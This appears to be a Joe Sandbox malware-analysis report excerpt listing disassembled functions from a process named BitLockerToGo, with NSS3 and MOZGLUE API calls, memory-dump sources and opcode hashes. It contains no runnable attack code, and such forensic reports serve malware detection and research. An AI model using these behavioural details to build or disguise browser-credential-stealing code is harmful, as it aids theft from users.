                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1978757487-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fd807851a84a0b3e4c32a108e7f96b9be111075024a094e9c50233ab096d7168
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a8c0f18761a284da51b50161ab0346d03bb10536ad6d7f152a977a3a1bdb6904
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd807851a84a0b3e4c32a108e7f96b9be111075024a094e9c50233ab096d7168
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37214B709096069FD700AF39D584699BBF8FF48318F49456EE898ABB41D730E894CBD2
                                                                                                                                                                                                                                                                                                                    Function 6CABCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD1E10: TlsGetValue.KERNEL32 ref: 6CAD1E36
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD1E10: EnterCriticalSection.KERNEL32(?,?,?,6CAAB1EE,2404110F,?,?), ref: 6CAD1E4B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD1E10: PR_Unlock.NSS3 ref: 6CAD1E76
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,6CABD079,00000000,00000001), ref: 6CABCDA5
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(?,6CABD079,00000000,00000001), ref: 6CABCDB6
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CABD079,00000000,00000001), ref: 6CABCDCF
                                                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,6CABD079,00000000,00000001), ref: 6CABCDE2
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CABCDE9
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1720798025-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 395c23e34aa4ed0cbabef91886994f1507c82988bc5418ae7000b9e6f9b5b4c2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0869b6ce865bc48502f1d1b267c0e95d645063b69f27f0bc5df429ae73db586a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 395c23e34aa4ed0cbabef91886994f1507c82988bc5418ae7000b9e6f9b5b4c2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D011A3B6B01115ABDB00AE65EC45E96773CFB0869D7180121F91997E01D732F4B4C7E1
                                                                                                                                                                                                                                                                                                                    Function 6CB22CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB25B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB25B56
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB22CEC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PR_EnterMonitor.NSS3(?), ref: 6CB22D02
                                                                                                                                                                                                                                                                                                                    • PR_EnterMonitor.NSS3(?), ref: 6CB22D1F
                                                                                                                                                                                                                                                                                                                    • PR_ExitMonitor.NSS3(?), ref: 6CB22D42
                                                                                                                                                                                                                                                                                                                    • PR_ExitMonitor.NSS3(?), ref: 6CB22D5B
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8aa068aecb84a86fa2e027d5854e9e8082d56c74c9333e7251ad2d1dae27f50e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2201E5F19102905BE7309F25FC40AABB3A5EB45368F000525E85DC7710D736F8258693
                                                                                                                                                                                                                                                                                                                    Function 6CB22D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB25B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB25B56
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB22D9C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PR_EnterMonitor.NSS3(?), ref: 6CB22DB2
                                                                                                                                                                                                                                                                                                                    • PR_EnterMonitor.NSS3(?), ref: 6CB22DCF
                                                                                                                                                                                                                                                                                                                    • PR_ExitMonitor.NSS3(?), ref: 6CB22DF2
                                                                                                                                                                                                                                                                                                                    • PR_ExitMonitor.NSS3(?), ref: 6CB22E0B
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 153d6095da219100a19c4756327157f4581d832cdf8ad56ac95619d2f4abdb2d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D801A5B59102905BEB309E25FC05BDBB7A5EB41368F440535E85D87B10D736F8258693
                                                                                                                                                                                                                                                                                                                    Function 6CABAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CABAE42), ref: 6CAA30AA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAA30C7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CAA30E5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAA3116
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAA312B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: PK11_DestroyObject.NSS3(?,?), ref: 6CAA3154
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAA317E
                                                                                                                                                                                                                                                                                                                    • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CA999FF,?,?,?,?,?,?,?,?,?,6CA92D6B,?), ref: 6CABAE67
                                                                                                                                                                                                                                                                                                                    • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CA999FF,?,?,?,?,?,?,?,?,?,6CA92D6B,?), ref: 6CABAE7E
                                                                                                                                                                                                                                                                                                                    • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CA92D6B,?,?,00000000), ref: 6CABAE89
                                                                                                                                                                                                                                                                                                                    • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CA92D6B,?,?,00000000), ref: 6CABAE96
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CA92D6B,?,?), ref: 6CABAEA3
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 754562246-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 40554e8386ee5784695a16724dee70479c2c9ea1da72c6173ab1c9c7663126ea
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0cef65190d5da41d6437709f6fb30f3d36474497d4d6ba5fb3cb77c6fd746291
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40554e8386ee5784695a16724dee70479c2c9ea1da72c6173ab1c9c7663126ea
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8018176B0507057E60191ADAD85AAB316E8B8765CB080031F90AEBB02F636DDDD46E2
                                                                                                                                                                                                                                                                                                                    Function 6CBAADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(6CBAA6D8), ref: 6CBAAE0D
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CBAAE14
                                                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(6CBAA6D8), ref: 6CBAAE36
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CBAAE3D
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,00000000,?,?,6CBAA6D8), ref: 6CBAAE47
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 682657753-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: bbc405c7ce6882ec95cda8fb4cfaad33f2aa0f25570938e5f88fcd7f159e6abf
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 22b727db1896211446741404c43edd33a62c09a701ec3f0b34a18ed200d34279
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbc405c7ce6882ec95cda8fb4cfaad33f2aa0f25570938e5f88fcd7f159e6abf
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBF09C7610160557CA10AFA4E4089577B7CFF4DBB57240328E57A83940D731E116CFD5
                                                                                                                                                                                                                                                                                                                    Function 6C99D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: GetCurrentProcess.KERNEL32(?,6C9731A7), ref: 6C9ACBF1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9731A7), ref: 6C9ACBFA
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D4F2
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D50B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97CFE0: EnterCriticalSection.KERNEL32(6C9FE784), ref: 6C97CFF6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97CFE0: LeaveCriticalSection.KERNEL32(6C9FE784), ref: 6C97D026
                                                                                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D52E
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FE7DC), ref: 6C99D690
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D751
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                                                    • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b942c921620e646127782654a3c1691ae450ba77b64710d5016c4dbab84580e8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2e7e0db84fb3f9837b98ad5794626d567614efca4220aad113658b020a4eec21
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b942c921620e646127782654a3c1691ae450ba77b64710d5016c4dbab84580e8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E51E372A087058FD314CF28C0D075AB7F5EB89708F28492ED5AAC7B84D771E801CB92
                                                                                                                                                                                                                                                                                                                    Function 6C9CB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C974290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9B3EBD,6C9B3EBD,00000000), ref: 6C9742A9
                                                                                                                                                                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C9CB127), ref: 6C9CB463
                                                                                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9CB4C9
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C9CB4E4
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                                                                                                                    • String ID: pid:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 149fa344ed1f20dbe613dc2110048e288ea270a3214ca82d7a6d7d78437e3d7d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a2d6aa3c8c2bda6ff5f6423b1de76d950660fe7b75ce8aa85677af645214f81
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 149fa344ed1f20dbe613dc2110048e288ea270a3214ca82d7a6d7d78437e3d7d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6311031B05208DBDB10DFA9D880AEEB7B9BF15318F580529D91167A41D736E849CBE3
                                                                                                                                                                                                                                                                                                                    Function 6CA26C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CA26D36
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • database corruption, xrefs: 6CA26D2A
                                                                                                                                                                                                                                                                                                                    • %s at line %d of [%.10s], xrefs: 6CA26D2F
                                                                                                                                                                                                                                                                                                                    • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA26D20
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                    • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 45492318a9074b4d5b3f4a83b401de1c0e0f8e4a60319f4ad20dc004e4f82576
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3eb87a7bb639d53faa188232a7a5c976e2c9d37babe7098fd0e18ed901c86ba0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45492318a9074b4d5b3f4a83b401de1c0e0f8e4a60319f4ad20dc004e4f82576
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE213330604B199BC710CE1AC941B5AB7F6AF80318F28852CD8499BF51E374F9C9CB92
                                                                                                                                                                                                                                                                                                                    Function 6CB5CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB5CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB5CC7B), ref: 6CB5CD7A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB5CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB5CD8E
